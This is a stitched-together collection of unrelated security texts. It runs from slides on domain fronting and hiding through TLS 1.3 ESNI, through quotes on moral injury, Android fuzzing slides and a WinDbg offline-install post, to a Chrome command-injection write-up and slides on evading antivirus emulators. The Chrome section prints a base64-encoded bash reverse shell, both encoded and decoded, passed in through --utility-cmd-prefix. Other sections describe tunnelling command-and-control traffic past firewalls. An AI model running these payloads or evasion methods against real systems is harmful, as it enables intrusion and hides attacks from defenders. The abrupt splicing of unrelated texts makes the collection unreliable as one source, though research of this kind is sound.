Domain Fronting is Dead, Long Live Domain Fronting Using TLS 1.3 to evade censors, bypass network defenses, and blend in with the noise Erik Hunstad Outline 0 Domain Fronting 101 ● If you wish to make an apple pie from scratch, you must first invent the universe ● To understand Domain Fronting, you must first understand HTTP over TLS (aka HTTPS) ● Server Name Indication (SNI) allows multiple sites to be hosted on the same IP ● TLS 1.3 enables encrypted certificates and encrypted Server Name Identification (ESNI) ● DNS over TLS or HTTPS + TLS 1.3 = domain fronting 2.0 or “domain hiding” HTTP Basics ● First, a user requests the IP of a server via DNS ● This is an unencrypted packet sent to UDP port 53 HTTP Basics ● The DNS server responds with an IP address ● The response is also unencrypted HTTP Basics ● The user sends a GET request, using the domain in the “Host” header ● TCP port 80 - unencrypted HTTP Basics ● The server responds with HTML content HTTP Basics ● Obviously bad because nothing is encrypted ● Both the DNS and HTTP request and response are in plaintext HTTP Basics ● Obviously bad because nothing is encrypted ● Both the DNS and HTTP request and response are in plaintext HTTPS Basics ● Starts off the same way, a user requests the IP of a server via DNS ● This is an unencrypted connection on UDP port 53 HTTPS Basics ● The DNS server responds with an IP address ● The response is also unencrypted HTTPS Basics ● The user sends a ClientHello to start the TLS handshake ● Server uses the “server_name” field (plaintext) to lookup how to respond HTTPS Basics ● The server responds with a certificate (in plaintext unless TLS 1.3) and completes the handshake ● All data after the handshake is encrypted HTTPS Basics ● Much better than HTTP ● Entire DNS process and the certificate exchange process are still unencrypted HTTPS Basics ● Much better than HTTP ● Entire DNS process and the certificate exchange process are still unencrypted Domain Fronting ● Circumvent censorship by obfuscating the domain of an HTTPS connection ● Connect to an approved server, but send an HTTP request for the actual destination ● Uses a hosting service to host the true destination - false destination must be on the same service ○ Google App Engine ○ Amazon S3/CloudFront ○ Microsoft Azure CDN ○ Others Domain Fronting ● DNS lookup as before for any site hosted by the hosting service ● Client and Server handshake as usual Domain Fronting ● Client and Server handshake as usual Domain Fronting ● Client sends an HTTP request with the Host header set to the actual destination ● The CDN forwards the request as long as the destination is hosted by the service ○ Any site on GAE could be used to front for an otherwise censored GAE server Domain Fronting ● Like a letter delivered to a house with multiple residents ● The mailman can see the address on the outside ● Letter on the inside goes to the correct person Domain Fronting ● April 2018 - The music stops ● Google ○ “Domain fronting has never been a supported feature at Google”1 ● Amazon ○ Implemented “Enhanced Domain Protections” ○ “no customer ever wants to find that someone else is masquerading as their innocent, ordinary domain”2 ○ Think of the innocent children ordinary domains! ● Cloudflare ○ Only HTTP works ● Azure ○ Still works... 
For now [1] A Google update just created a big problem for anti-censorship tools [2] Enhanced Domain Protections for Amazon CloudFront Requests Domain Fronting - Issues ● Major providers shut it down ● Limited fronting options ○ Only sites hosted on the same provider can be used to front ● Must host an “app” or have an account with the provider ○ Not free ■ Bandwidth ■ CPU time ○ Complex sign up requirements ■ Identity checks ■ Phone required ■ Credit card required 1 The Growth of TLS 1.3 31.7% The Growth of TLS 1.3 59% DNS - Fixing the Problem ● What if you wrap a DNS request in TLS? ● How about HTTPS? (RFC 8484) ● "The unmitigated usage of encrypted DNS, particularly DNS over HTTPS, could allow attackers and insiders to bypass organizational controls." - SANS3 ○ Great! [3] A New Needle and Haystack: Detecting DNS over HTTPS Usage TLS 1.3 and ESNI ● Now that DNS is encrypted, it can be used to fetch a public key before an HTTPS connection is started ● Classic Diffie-Hellman key exchange to symmetrically encrypt the server_name ○ All data required is sent in a single Client Hello (the client’s public key + extras) TLS 1.3 and ESNI - Step by Step ● Client requests the IP address and ESNI public key via DNS over TLS or HTTPS TLS 1.3 and ESNI - Step by Step ● DNS server returns the IP address and ESNI public key via DNS over TLS or HTTPS ● Cloudflare rotates their key every ~1 hour (with a few hours of buffer allowed by the servers) TLS 1.3 and ESNI - Step by Step ● Client sends a TLS 1.3 ClientHello with an encrypted_server_name extension TLS 1.3 and ESNI - Step by Step ● Web server responds with a ServerHello that includes the encrypted certificate TLS 1.3 and ESNI - Weak Spots ● DNS response for IP or _esni could be tampered with (poisoned resolver cache) ● DNSSEC!4 [4] How DNSSEC Works TLS 1.3 and ESNI - Weak Spots ● DNS over TLS or HTTPS is completely blocked ● Preload ESNI keys to bootstrap the connection TLS 1.3 and ESNI - Weak Spots ● The TLS connection goes to an IP address ● An IP may be shared by many domains, but may not ● Is there a generally applicable way to route to any domain via any other? ○ No, but how close can we get? Domain Hiding and DNS - Issues Issue Solution DNS is unencrypted DNS over TLS or HTTPS DNS is untrustworthy DNSSEC Encrypted DNS is blocked Bootstrap ESNI keys SNI is unencrypted ESNI IPs (or IPs that domains resolve to) are blocked Domain hiding with the largest CDN! 2 Cloudflare ● Founded in 2009 ● Content Delivery Network (CDN) ○ Highest number of internet exchange points of any network ○ Largest CDN in the world ○ Supports TLS 1.3, ESNI, Websockets, and QUIC ● Authoritative DNS ○ Over 26,000,000 domains ○ Supports DNSSEC Domain Hiding with Cloudflare ● A TLS 1.3 connection with ESNI is sent to ANY Cloudflare server ○ SNI can be included as well - does not have to match ESNI value ● A HTTP request is sent using that connection can have any Host header ○ True domain must have DNS provided by Cloudflare ● Cloudflare will forward the request to the true destination - just like domain fronting! 
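The classic fronting request described above can be sketched with nothing but the standard library: the TCP connection, SNI and certificate check all use one name, while the HTTP Host header names the true destination. This shows only the classic half; the ESNI-based hiding needs a patched TLS stack such as the Noctilucent Go library introduced below, and both domain names here are placeholders, not tested fronts.

import socket, ssl

FRONT = "allowed.example.com"    # hypothetical domain the censor/filter permits
HIDDEN = "blocked.example.com"   # hypothetical true destination behind the same CDN

ctx = ssl.create_default_context()
raw = socket.create_connection((FRONT, 443), timeout=10)
tls = ctx.wrap_socket(raw, server_hostname=FRONT)   # DNS, SNI and cert check all see FRONT

request = ("GET / HTTP/1.1\r\n"
           f"Host: {HIDDEN}\r\n"                    # the CDN routes on the Host header
           "Connection: close\r\n\r\n")
tls.sendall(request.encode())
print(tls.recv(4096).decode(errors="replace"))
tls.close()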
● Robin Wood (@digininja) was the first to show this was possible Noctilucent ● Go (Golang) rewrite of crypto/tls based on Cloudflare’s tls-tris project ● TLS 1.3 support ○ Config options specific for domain hiding ■ ESNIServerName - does not need to match the SNI extension or Host header ■ PreserveSNI - Allows the sending of a ClientHello with both SNI and ESNI extensions ● Drop in replacement for standard crypto/tls - backwards compatible ● Test client application ○ Attempts DNS over HTTPS (DoH) - Falls back to DNS over TLS, then system default DNS ○ Allows command line tuning of nearly every part of the TLS and HTTP connection ○ HTTPS and Websocket support ○ Cross platform! Normal HTTPS Connection TLS 1.3 + ESNI HTTPS Connection Hidden Request (no SNI) Fronted Request (with SNI) So what? ● Any domain protected by Cloudflare is able to arbitrarily front to any IP ○ Target IP can be hosted anywhere ○ DNS must be run via Cloudflare ● Cloudflare Managed DNS is free ● Signup requirements? ○ Email (disposable is ok) ○ Password ○ That's it! What Can You Hide With? ● Source: Alexa top 100,000 domains ● HTTPS GET request looking for cloudflare cookies, Expect-CT header, or Server ● Results: ○ At least 21% of the top 100,000 domains are available to front (21,298) ○ A few examples: ■ myshopify.com ■ medium.com ■ discordapp.com (on the PA whitelist)5 ■ udemy.com ■ zendesk.com ■ coinbase.com (on the PA whitelist)5 ■ hdfcbank.com ■ mozilla.org (on the PA whitelist)5 ■ teamviewer.com ■ blackboard.com ■ okta.com ■ bitdefender.com ■ ny.gov ■ mlb.com ■ stanford.edu ■ plex.tv ■ coronavirus.gov.hk ■ So much porn... [5] List of Domains and Applications Excluded from SSL Decryption Just doing some Single Sign On... SNI Based Web Filters ● Many products only look at SNI ○ ESNI completely ignored ● By preserving the SNI along with ESNI, filters and analytics can be tricked ● Example: Untangle ○ Installed with strict web filter settings Fooling SNI based Firewalls Fooling SNI based Firewalls HTTPS Decrypting Firewalls ● Seen in enterprise environments ○ Install a root certificate on endpoints ○ Break and re-encrypt traffic that passes through ○ Corporate Man-in-the-Middle ● Allows analysis of full packet data! ● Kazakhstan attempted this nation-wide in July 20196 ● Does TLS 1.3/ESNI offer a way around these firewalls? [6] Kazakhstan government is now intercepting all HTTPS traffic HTTPS Decrypting Firewalls ● Palo Alto PA-VM 10.0.0 ○ Released 2020-06-17 ○ Major new feature: TLS 1.3 decryption ○ Default decryption profile does not include TLS 1.3! ■ Allows TLS 1.3 to pass with an error [Palo Alto bypass via Mozilla fronting] What Else? ● Many connections to a fronted site may be suspicious ○ What protocols can we use? ■ HTTP ✅ ■ Websockets ✅ ■ Arbitrary TCP/UDP via a helper ✅ Fronting Streaming data with Websockets [Cloak Demo] [Cloak+CobaltStrike Demo] [DeimosC2 Demo] 3 What is Blue to Do? ● Disable TLS 1.3 (25-50% of traffic) ● Block Cloudflare (26 million domains)? ● Block ClientHellos with an encrypted_server_name extension? ○ Technically possible ○ Netsweeper >=6.4.1 (2020-02-25) can block all ESNI traffic ■ Cannot categorize sites ■ All or none ○ No other vendors currently support ESNI blocking as of today What is Blue to Do? ● Flag on ClientHello packets with both “server_name” and “encrypted_server_name” ○ Snort ■ Possible with custom rules? 
■ ssl_state:client_hello ■ tls.version can narrow down to 1.3 ■ SNI extension type is 0x0000 ■ ESNI extension type is 0xffce ○ Securicata ■ Snort with extra features ■ has tls.sni but no tls.esni What is Blue to Do? ● “Good old fashioned police work” ○ Beaconing detection and anomaly network analytics ■ RITA or BeaKer (or fancy AI/ML) ■ How much should a user interact with a site? How often? How much data? ○ JA3 and JA3S mismatches ■ Should svchost.exe have a JA3 fingerprint of Go? ■ Cloak and utls are working to defeat this ○ Well instrumented EDR, application whitelisting, etc ■ Don’t get pwned in the first place! ■ “Server administrators should never allow untrusted code to run on the server” -Microsoft Domain Hiding - Noctilucent - The Future ● Latest advancement in censorship resistant communication ● Useable today ○ Go - drop in replacement ○ Cloak fork - use with anything that can be proxied (CobaltStrike, etc) ● Will be harder to block as TLS 1.3 and ESNI adoption grows ● ESNI RFC is in flux (last updated 2020-06-01) - might break tomorrow ○ Actually called ECH as of May 2020 ● Currently relies on a single (massive) CDN ○ Cloudflare please don’t break this ● Blue Team: Your move! References/Resources ● A New Needle and Haystack: Detecting DNS over HTTPS Usage ● Wikipedia: Domain Fronting ● Blocking-resistant communication through domain fronting ● Encrypt it or lose it: how encrypted SNI works ● Encrypted Server Name Indication for TLS 1.3 ● Godns - a simple client lib for doing dns over https ● How DNSSEC Works ● SSL Labs - SSL Pulse ● Domain fronting through Cloudflare ● TLS-tris ● RITA (Real Intelligence Threat Analytics) Special Thanks ● Robin Wood (@digininja) - freelance pen-tester, researcher and developer ● Andy Wang (cbeuw) - developer of Cloak ● Nick Sullivan (@grittygrease) - Head of Research and Cryptography at Cloudflare Questions Erik Hunstad Personal Twitter: @badsectorlabs Personal Blog: blog.badsectorlabs.com https://github.com/SixGenInc/Noctilucent
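As a rough illustration of the blue-team idea above (flag ClientHellos that carry both a plaintext server_name and the draft encrypted_server_name extension), here is a minimal parser sketch. The 0x0000 and 0xffce code points are the values quoted in the slides; the offset walk follows the standard ClientHello layout. This is a prototype for experimentation, not a drop-in Snort/Suricata replacement.

import struct

SNI, ESNI = 0x0000, 0xffce   # server_name and draft encrypted_server_name code points

def clienthello_extensions(record: bytes) -> set:
    """Return the set of extension types found in a TLS ClientHello record."""
    assert record[0] == 22 and record[5] == 1, "not a handshake/ClientHello record"
    i = 9 + 2 + 32                                   # skip record+handshake headers, version, random
    i += 1 + record[i]                               # session_id
    (cs_len,) = struct.unpack_from("!H", record, i); i += 2 + cs_len   # cipher suites
    i += 1 + record[i]                               # compression methods
    (ext_len,) = struct.unpack_from("!H", record, i); i += 2
    types, end = set(), i + ext_len
    while i < end:
        etype, elen = struct.unpack_from("!HH", record, i)
        types.add(etype)
        i += 4 + elen
    return types

def looks_like_domain_hiding(record: bytes) -> bool:
    # Flag ClientHellos carrying BOTH plaintext SNI and draft ESNI
    exts = clienthello_extensions(record)
    return SNI in exts and ESNI in exts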
“Resilience is a form of health.” - Dr. Steve Miles “Grossman!!!” I declare the global social space we are building to be naturally independent of the tyrannies you seek to impose on us. You have no moral right to rule us nor do you possess any methods of enforcement we have true reason to fear. - John Perry Barlow First the explorers, then the pioneers, then the merchants. 
 “And Then the Merchants” from Imaginary Gardens February 26, 1998 One must spend at least a year after the first week in a new culture to learn as much as one did in that first week. That’s how fast we are assimilated. “Human nature is almost unbelievably malleable, responding accurately and contrastingly to contrasting cultural conditions.” Margaret Mead, (Sex and Temperament in Three Primitive Societies (1935) p. 191 “The price one pays for pursuing any profession or calling is an intimate knowledge of its ugly side.” – James Baldwin "Whoever battles monsters should take care not to become a monster too, For if you stare long enough into the Abyss, the Abyss stares also into you." Friedrich Nietzsche, Beyond Good and Evil, chapter 4, no. 146 The illegal drug trade in Haiti involves trans-shipment of cocaine and marijuana to the United States. It is a major shipment route. Haiti in an ideal location for drug smuggling between Colombia and Puerto Rico. Cocaine is also often smuggled directly to Miami in freighters.[ U.S. government agencies estimate that eight percent of the cocaine entering the United States in 2006 transited Haiti or the Dominican Republic. Leading members of the Haitian military, intelligence and police were involved in the illegal drug trade in Haiti. Moral injury refers to an injury to an individual's moral conscience resulting from an act of perceived moral transgression which produces profound emotional shame. The concept of moral injury emphasizes the psychological, cultural, and spiritual aspects of trauma. We are technological somnambulists wandering through an extended dream. We don’t know where we’re going, but we’re on our way. Ethics inside: As former Director of Central Intelligence William Webster once put it, "In the United States, we obey the laws of the United States. Abroad we uphold the national security interests of the United States." https://dl.acm.org/citation.cfm?doid=1536616.1536630 Privacy and security: An ethics code for U.S. intelligence officers supernormals “You will become dead.” The Hero’s Journey. The hero encounters obstacles and barriers. They can outwit them, run away from them, destroy them, or fail. Failure is also honorable. All choices are honorable. When she speaks of “we” there is hope. When we speak of “I” it emphasizes helplessness. We can talk it out or we can act it out. WHAT HELPS? When I go to disaster areas, I decompress on the way out in a non-affected part of the country so that I can see the loveliness of the land and people.  After horrendous times in Indonesia, Bosnia, even Angola, I found that I was restored in the everyday rhthyms of life, coffee shops, a beer at sunset for a couple days. In each place, local detox has helped me see the loveliness of the people and place. A week in a small town with a decent fish market after six weeks with a parade of dump trucks of bodies in Indonesia post tsunami was the last test of a strategy developed over the years.  It sure beats breaking down in an upscale grocery market stateside because I got the cultural bends from ascending too fast from my first experience in a guerrilla war zone on the Thai Cambodian border. == Dr. 
Steven Miles, author of “Oath Betrayed” and the forthcoming “The Torture Doctors” family friends gardening music yoga meditation physical - strength training, running, martial arts writing about it communities of trust, redemption, transcendence – creation, formation, sustaining a conscience M F A 12 step communities spirituality managing one's ego HIDDEN CREATIVE PROPERTIES "post-traumatic growth." In the face of a major loss, our brains often explore new creative outlets as part of the "rebuilding" process of our lives, 70% of survivors experience some kind of positive psychological change after a traumatic experience. VICTOR FRANKL be mindful and vigilant “I am firmly convinced one cannot do so alone.  One needs trusted companions for sanity. “ COMMUNITY => Mutuality, Feedback, Accountability  Evil against evil => more evil.
DROID-FF – THE ANDROID FUZZING FRAMEWORK TWITTER : @ANTOJOSEP007 GITHUB : @ANTOJOSEPH @WHOAMI • security engineer @ intel • android security enthusiast • speaker / trainer @ Hitb Amsterdam, brucon / hackinparis / blackhat / nullcon / ground zero / c0c0n … • when not hacking , you can see me travelling / djing / biking DROID-FF : WHY ? • attempts to solve fuzzing in mobile devices (* android ) • challenges in fuzzing : • data – generation • low powered devices • crash logging • crash triage • exploitable or not ? DROID-FF : APPROACH • scripts written in python • integrates with peach / pyzuff / radamsa • custom crash logging • custom crash triaging • exploitable checks via gdb plugin J • Fully automated DROID-FF : DATA GENERATION • two approaches • dump fuzzing using radamsa / pyzuff • generation based fuzzing using peach • to counter checksums / magic numbers , custom fixers are added (for eg : dex repair for fixing checksums in randomly mutated dex files (credits : github.com/anestisb ) • Grammar specified in pit files for peach DROID-FF : FUZZING CAMPAIGN • Runs the generated files against the target binary ( for eg : /system/xbin/dexdump crash1.dex ) • Makes use of adb_android python module to push generated files to device • Makes use of adb shell command to execute the file against the target binary • Adds a custom log to the android logcat so that we can track any files responsible for the crash ( for eg : log -p F -t CRASH_LOGGER SIGSEGV : filename.dex ) DROID-FF : BUILDING ANDROID MODULES • Navigate to the module directory ( eg : /frameworks/av/cmd/stagefright/) • Use the make helper • source build/envsetup.sh • edit (/frameworks/av/cmd/stagefright/Android.mk) and LOCAL_MODULE =$BUILD_EXECUTABLE • mma ( /out/target/product/generic/system/xbin/dexdump) DROID-FF : PROCESSING THE LOGS • Pulls the adb logcat data from the device by saving it to a file and adb pull • Parse the log file and look for crashes ("SIGSEGV", "SIGSEGV", "SIGFPE","SIGILL”) • If a crash is found , go up the lines until you find our custom crash file name logger • Queue the file responsible for the crash to double check DROID-FF : CRASH VERIFICATION • Runs the files responsible for crash against the target binary • In the event of a crash , android system writes tombstone files ( crashdump ) to the /data/tombstones directory . • Backup the tombstone file along with the file responsible for crash • Look for duplicate crashes by filtering the pc register value in the tombstone file and only save unique crashes DROID-FF : PROCESS TOMBSTONES • Unique crashes needs to be mapped to relevant source code • Using ndk-stack and addr2line utilities ( android –ndk tools ) , we map the crash to a line in the android source code • Ndk-stack : • /path/to/file_with_symbols • /path/to/tombstone_file DROID-FF : PROCESS TOMBSTONE (2) • Addr2line • Address of the crash obtained by running ndk-stack in the target module • "-C","-f", "-e", symbols_file_of_crash, address_of_the_crash • Output gives the function and filename responsible for the crash DROIF-FF : EXPLOITABLE ? • Uses a gdb plugin ”exploitable “ which supports arm • Looks at the state of the process when in crashes / unwinds stack etc and predicts based on custom rules • Runs using python gdb api ( (gdb) source ../path/to/exploitable.py) • Gdbserver for arm is pushed to the device DROID-FF : EXPLOITABLE ? 
(2) • root@goldfish: ./gdbserver :5039 /system/xbin/dexdump crash1.dex • (gdb) set solib-absolute-prefixdb /path/to/symbols/ • (gdb) set solib-search-path /path/to/symbols/system/lib/ • (gdb) target remote : 5039 • (gdb) c • Wait for process to crash or send it a kill sig ( kill -9 pid ) • (gdb) exploitable • (gdb ) Stack Corruption , Exploitable : True , Description : blah blah blah DROID-FF : ACHIEVEMENTS • A lot of crashes , A LOOOOOOOTTTT ! • Fuzzing made easier and available for the masses • Mostly automated • Easily customizable • Python J • Source : github.com/antojoseph/droid-ff DROID-FF : FUTURE IMPROVEMENTS • Integration with ASAN • Add support for automated gdb exploitability test and reporting • Instrumented fuzzing ? • Automate posting of exploitable crashes to android security group ? J AFL FOR ANDROID • Intel open sourced their implementation of afl on android • Responsible for a lot of stagefright crashes • Instrumented fuzzing helps in better coverage of all code paths HONGFUZZ • Runs within android • Ported to android by (github.com/anestisb) • Easy to get up and running with and very useful for quickly fuzzing binaries • Built-in native crash logging mechanism ( over-rides android debuggered ) THANKS • @Ananth Srivastava – for all the packaging and suggestions • @Sumanth Naropanth – for being a cool manager • @jduck – for inspiration to write fuzzers and all the help from droidsec irc ( those series of stagefrights J ) • @anestisb – for those tools and articles on android fuzzing • @Alexandru Blanda – for his work in MFF and being a good friend • @Stephen Kyle - for his articles on fuzzin in ARM • @flanker_hqd– BH Presentation on Fuzzing Parcels HOW TO : DROID-FF HOW TO : DROID-FF : STEP 1 • Python droid-ff.py • Select the data –generator to use • Options ( bitflipper / radamsa / peach ) • On Error : • (make sure you have the python requirements installed) • pyZUFF • adb_android HOW TO : DROID-FF : STEP 2 • To Run the fuzzing campaign : • Have android emulator up and running • Android avd • Start the emulator • Test by checking “adb devices ” in the console • Once running , run droif-ff.py and select option 2 HOW TO : DROID-FF : STEP 3 • Find crashes in your fuzzing campaign • Make sure your emulator is still running and you can connect via adb • Select step 3 in droid-ff.py • This will pull the adb logs and search for any crashes and identify the files responsible • On Error : • Make sure you have all the required directories in the fuzzer folder , else moving files will fail • Manually verify the logcat output and check if the script missed any crashes (very unlikely) HOW TO : DROID-FF : STEP4 • To avoid false positives : • All files which are identified to case a crash in the previous step is run again • If crash happens , a resulting tombstone file is created • We pull the tombstone file and identify the pc address of the crash • We keep a dict of key value pairs of {pc , filename } and unique crashes are identified and moved to a separate folder HOW TO DROID-FF : STEP 5 • The crashes are resolved to a filename and method : • Using ndk-stack tool , binary with symbols and the tombstone file , we can print the stack frame • Using addr2line , address from ndk-stack and binary with symbols , we resolve the crash to a line and method in the sourcode HOW TO : DROID-FF : STEP 6 • Check exploitability : • Uses a gbd plugin which supports linux arm • Loaded via .gdbinit • Set symbol search path in gdb • adb forward tcp:5039 tcp:5039 • gdbserver runs on the android device and 
listens on tcp port 5039 • gdb connects to gdb server and continues the execution of the binary until fault • On fault signal , run exploitable and prints the result WHAT NEXT ? • Do a second round of manual analysis to make sure the bug is exploitable • Reproduce the bug in different devices / architectures • Report and exhaustive security bug report to the android security team • If you are lucky , get your android – security bounty $$$ THANKS J • Questions please …
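The log-processing step (droid-ff.py step 3) boils down to: dump logcat, find the fatal-signal lines, then walk back to the most recent custom CRASH_LOGGER marker to recover which fuzz file was executing. A minimal sketch, assuming the tag format shown earlier (log -p F -t CRASH_LOGGER SIGSEGV : filename.dex); everything outside the signal list and the tag name is illustrative.

import re
import subprocess

FATAL = ("SIGSEGV", "SIGFPE", "SIGILL")                    # fatal signals listed in the deck
MARKER = re.compile(r"CRASH_LOGGER.*:\s*(\S+)\s*$")        # log -p F -t CRASH_LOGGER <sig> : <file>

def crashing_inputs(logcat_text: str) -> set:
    """Map fatal-signal crashes back to the fuzz file that was being executed."""
    lines = logcat_text.splitlines()
    hits = set()
    for i, line in enumerate(lines):
        if "CRASH_LOGGER" in line or not any(sig in line for sig in FATAL):
            continue
        # crash found: walk upwards to the most recent custom marker line
        for prev in reversed(lines[:i]):
            m = MARKER.search(prev)
            if m:
                hits.add(m.group(1))
                break
    return hits

if __name__ == "__main__":
    # equivalent of pulling the logcat data: dump the buffer and parse it
    log = subprocess.run(["adb", "logcat", "-d"], capture_output=True, text=True).stdout
    for path in sorted(crashing_inputs(log)):
        print("crash candidate:", path)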
Installing WinDbg Preview offline

Because of some recent work I am back on the number-one debugger in the universe, windbg. I am working in a Windows Server ECS environment, though, so I cannot install WinDbg Preview from the Microsoft Store and had to make do with plain windbg for the time being. People are visual creatures: staring at the ugly old windbg in front of me, I fell into deep thought and decided to work out how to install WinDbg Preview offline.

Here is the installation method I found:

Find the Microsoft Store page for WinDbg Preview: https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86?hl=zh-hk&gl=HK

Then feed that URL to https://store.rg-adguard.net/ to resolve the download address of the installation package.

The resolved file with the .appx suffix is the installation package. Copy its download address and install it with PowerShell:

# Download the package
PS C:\Users\Administrator\Desktop> Invoke-WebRequest 'http://tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/978feae8-9dfb-448a-af1a-f85fa96fd5ab?P1=1658971914&P2=404&P3=2&P4=j21fqtjctMAIZuAGmX1bFOHKmo2AuSBnK8H4GKqFYqcAHmZ14Y3bpEiKp1FYwXkaAkiz%2fC7TQy2EF6kpYWJuyg%3d%3d' -OutFile .\windbg.appx

# Install
Add-AppPackage -Path .\windbg.appx

After that it is installed successfully, and it looks so much better.
Chrome on macOS/Linux: from --gpu-launcher to a bash shell

0x00 Background
Chrome can be made to run arbitrary commands on macOS and Linux through its --gpu-launcher family of switches. The public Windows PoC simply pops cmd, and the usual Linux demo only runs something like touch, so the goal here is a proper bash shell.

0x01 --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix
Chrome ships several debugging switches that prepend an arbitrary command to the command line of its helper processes: --gpu-launcher=, --utility-cmd-prefix= and --renderer-cmd-prefix= (used together with --no-sandbox). In the Chromium source, --gpu-launcher wraps the launch of the GPU process, --renderer-cmd-prefix wraps renderer processes (and needs --no-sandbox / --user-data-dir to be useful), and --utility-cmd-prefix wraps utility processes. --utility-cmd-prefix is the one used below, on macOS and Linux.

0x02 A first --utility-cmd-prefix payload
Start simple:

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --no-sandbox --utility-cmd-prefix='ls -l'

Chrome dutifully runs ls. Getting anything more useful is harder: variations such as ls -l && pwd, bash -c 'ls -l', bash -c "ls -l" and bash -c '"ls -l"' all end in "command not found", because the prefix is not handed to a shell; it is split into argv for the new process, and Chrome appends its own arguments ('--nosandbox' '--xxxxxx' ...) behind it, so bash never sees the command line you intended.

0x03 ${IFS} to the rescue
Since spaces are the problem, let bash fill them in itself with ${IFS}:

bash -c ls&&id
bash -c ls${IFS}-l

The second one works: bingo, a bash shell. From there a full reverse shell is one command away (tested on Ubuntu; bash is enough, though python/php/ssh one-liners would work just as well):

chromium --no-sandbox --utility-and-browser --utility-cmd-prefix='/bin/sh -c echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx|base64${IFS}-d>reverse;bash${IFS}reverse'

The base64 string is a bash reverse shell to 127.0.0.1:8080, written to a file named reverse and then executed.

0x04 Takeaway
Everything comes down to how the prefix string is split into argv before the helper process is spawned.
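For reference, the base64 blob in the final payload is nothing exotic; decoding it shows the reverse shell it drops and runs:

import base64
print(base64.b64decode(
    "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx").decode())
# -> bash -i >& /dev/tcp/127.0.0.1/8080 0>&1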
Advanced Exploitation Techniques: Breaking AV-Emulator XCon2016/by nEINEI Who is @nEINEI • nEINEI - neineit@gmail.com • Security researcher / software developer /reverse engineer • http://www.vxjump.net • Research interests • Vulnerability, Advanced Exploitation Techniques ,NIPS/HIPS • Complexity Virus/Reverse engineering/Advanced Threat • … Agenda • AV-Emulator Architecture and Implementation • Background • AV-Emulator detection techniques • Advanced Techniques On AV-Emulator Bypass • Process stack information inspection • C++ advanced syntactic features • Randomized conditional branch generation • ROP simulation • DLL forwarding • Exploiting Windows memory heap management • AV-Emulator Bypass Mitigation AV-Emulator Architecture and Implementation • AV-Emulator Background? • Evolved virus polymorphism & metamorphism • Complex PE packers • malicious code behavior analysis Host Decryption Poly Engine Virus RAM Decryption Poly Engine Virus AV-Emulator Architecture and Implementation • If it is an PE unpacker? • AV-Emulator is far beyond a simple instruction simulator, it is currently implemented as a whole package(OS simulation, hardware simulation, etc). AV-Emulator Architecture and Implementation • If it is an PE packer? NO • Intel CPU simulation • Opcode identification • Addressing mode • Instruction analysis system • Hardware simulation(HDD ,memory,NIC…) • Windows OS Simulation • PE loader • Memory management • Task scheduler • API simulating • File system • Registry system • Exception handlers • Thread , process • Debugging system • GUI system • … AV-Emulator Architecture and Implementation • CPU simulation methods • Instruction simulation(used in most AV-emulators) • Instruction translation based on opcode, line-by-line parsing • Inefficiency, monitor each instruction • … • Dynamic translation(QEMU…) • Translate the opcode into intermediate code and interpretive execution • Fast,but the encryption and self-modification of malicious code results in multiple translations • … • Real Environment • Isolated space,malicious code execution in real environment. • Fast, instruction level control is not applicable. • … AV-Emulator Architecture and Implementation • Simulated instruction set • Generic • FPU • 3D Now (Only few) • … • Memory addressing cache • Registration on most recent accessed memory area. • … • CPU exception • TF • Int3 ,int1,int n • Non-existent page • Privileged instruction • Division by 0 exception • Dx register single-step exception • … AV-Emulator Architecture and Implementation • Hardware simulation • Memory, NIC,HDD • Allocate a bunch of memory blocks to simulate Memory, NIC,HDD. • … • PE Loader simulation • PE file mapped to memory. • PEB,TEB • … • API simulation • IAT • Dynamic load • … • Windows GUI • Simple thread scheduler(each thread run a fixed number of instructions, like 100.) • Windows – message notification • … AV-Emulator Architecture and Implementation • More Code-Emulator • Script-Emulator& boot-Emulator by Kaspersky && • At 2016-8,《Detection on SWF vulnerability base on virtual stack machine》 • http://pdfpiw.uspto.gov/.piw?PageNum=0&docid=09396334 • Bitdefender B-HAVE • Virtual Machine for BAT/CMD scripts • VB script emulator • Virtual Machine for executable files (PE, MZ, COM, SYS, Boot Images) • Virtual Machine for VB scripts http://www.bitdefender.com/files/Main/file/BitDefender_Anti virus_Technology.pdf AV-Emulator Architecture and Implementation • How does the AV-Emulator detect packers automatically? • Inspect compiler information. 
• API instruction sequence • Track critical API call and scan compiler signatures. AV-Emulator Architecture and Implementation • How does the AV-Emulator detect packers automatically? • POP / OR / OR / CALL <sequence identification> 00401E3B | 89 65 E8 | mov dword ptr ss:[ebp-18],esp 00401E3E | 83 65 FC 00 | and dword ptr ss:[ebp-4],0 00401E42 | 6A 01 | push 1 00401E44 | FF 15 CC 41 40 00 | call dword ptr ds:[<__imp____set_app_type>] 00401E4A | 59 | pop ecx 00401E4B | 83 0D F4 32 40 00 FF | or dword ptr ds:[<___onexitend>],FFFFFFFF 00401E52 | 83 0D F8 32 40 00 FF | or dword ptr ds:[<___onexitbegin>],FFFFFFFF 00401E59 | FF 15 C8 41 40 00 | call dword ptr ds:[<__imp____p__fmode>] AV-Emulator Architecture and Implementation • AV-Emulator detection technology? • Critical API call • Malformed PE file • Malware API sequence • API parameters dynamic analysis • Illegal memory access request • Illegal file path request • Illegal registry path request AV-Emulator Architecture and Implementation • AV-Emulator detection technology? • Process creation • Sc service,loading DLL by svchost, CMD ,rundll32/net … • AutoRun • New service,existing service modification • Module load • Load drive,install global hook … • GUI • Hide windows,AV software window handler enumeration… • Network • SPI hook install, HOST file modification… • Cross-process • Read/write other processes AV-Emulator Architecture and Implementation • Registry • IEFO, disable Taskmagr/regedit,IE configuration modification … • Process enumeration • Kill AV software process… • Exception operation • Custom implementation of API feature, ntoskrnl.exe load… • Sensitive behavior • Call int2e/sysenter, bootmgr/ntldr/boot.ini read/write… AV-Emulator Architecture and Implementation • Various ways to bypass AV-Emulator • Timing attack • Huge amount of garbage instruction execution • Parent process detection • Make different conditions • No simulation instruction • Address information leakage • … • All above methods can be patched by AV-Emulator developer in a short time. AV-Emulator Architecture and Implementation What are we going to talk about, with it ? BLACKHAT USA 2016 AVLeak: Fingerprinting Antivirus Emulators for Advanced Malware Evasion https://www.blackhat.com/us-16/briefings.html#avleak-fingerprinting-antivirus- emulators-for-advanced-malware-evasion No,We focus on the weaknesses of AV-Emulator 